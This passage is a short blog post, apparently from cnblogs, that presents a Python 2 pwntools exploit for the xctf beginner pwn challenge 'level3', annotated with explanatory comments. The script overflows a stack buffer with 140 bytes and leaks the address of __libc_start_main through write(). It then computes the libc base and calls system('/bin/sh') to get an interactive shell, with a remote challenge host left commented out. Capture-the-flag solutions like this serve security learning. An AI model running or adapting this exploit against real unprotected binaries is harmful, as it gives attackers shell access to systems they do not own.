  • xctf pwn(新手练习)level3

    xctf pwn level3

    #-*-coding:utf-8-*-
    # Two-stage return-to-libc solution for the xctf "level3" practice binary,
    # written with pwntools: stage 1 leaks a resolved libc address through
    # write(), stage 2 uses that leak to call system("/bin/sh").
    # Python 2 only: it uses print statements and the generator .next() method.
    # NOTE(review): the script relies on a hard-coded code address and on an
    # overwrite reaching the return address unchecked, so the target presumably
    # has no PIE and no stack canary -- confirm with a checksec-style audit.
    # Those two hardening options are what a defender would look for here.
    from pwn import *
    # Run against a local copy of the binary; the remote target is commented out.
    p = process('./level3')
    #p = remote("111.198.29.45","36722")
    elf = ELF('./level3')
    # The libc loaded here must be the same build the target process uses,
    # otherwise the symbol offsets computed below are wrong. The commented
    # alternative is presumably the libc supplied with the challenge.
    libc = ELF('/lib/i386-linux-gnu/libc.so.6')
    #libc = ELF('./libc_32.so.6')
    # PLT stub of write() inside the binary.
    write_plt = elf.plt['write']
    print "write_plt: " + hex(write_plt)
    # print hex(elf.symbols['write'])
    # NOTE(review): despite the name and the printed label, this is the GOT
    # slot of __libc_start_main, not of write.
    write_got = elf.got['__libc_start_main']
    print "write_got: " + hex(write_got)
    # Offset of __libc_start_main inside the libc file (the label printed
    # below says "write_libc", which is misleading).
    libc_main = libc.symbols['__libc_start_main']
    print "write_libc: " + hex(libc_main)
    # Offset of system() inside the libc file.
    system_libc = libc.symbols['system']
    print "system_libc: " + hex(system_libc)
    # Hard-coded address inside the binary, used as the return address after
    # each stage; presumably the function containing the overflow -- TODO confirm.
    vulnfun = 0x804844B
    # pause()
    # Stage 1 builds the cdecl call write(1, write_got, 4), returning to vulnfun.
    #write(1,write_got,4)
    # Discard whatever the program prints first.
    p.recv()
    # 140 filler bytes, presumably the distance from the buffer to the saved
    # return address, followed by the return address and the next return.
    payload = 140*'a' + p32(write_plt) + p32(vulnfun)
    # Arguments of write(): fd 1 (stdout), address to dump, 4 bytes.
    payload += p32(1) + p32(write_got) + p32(4)
    p.sendline(payload)
    # The 4 bytes received are the runtime address of __libc_start_main
    # (the variable name says "write", see the note on write_got).
    write_addr = u32(p.recv(4))
    print "write_addr: " + hex(write_addr)
    # Wait for the operator before stage 2 (debugging stop).
    pause()
    # Runtime address minus file offset gives the load base of libc.
    offset = write_addr - libc_main
    system_addr = offset + system_libc
    # File offset of the first "/bin/sh" string found in libc.
    binsh = libc.search("/bin/sh").next()
    binsh_addr = offset + binsh
    print "binsh_addr: " + hex(binsh_addr)
    # Stage 2: same filler, then system(binsh_addr) with vulnfun as the
    # return address after system().
    payload = 140*'a' + p32(system_addr) + p32(vulnfun) + p32(binsh_addr)
    p.sendline(payload)
    # Hand the process I/O over to the terminal.
    p.interactive()
    
  • 原文地址:https://www.cnblogs.com/xlcm/p/11905751.html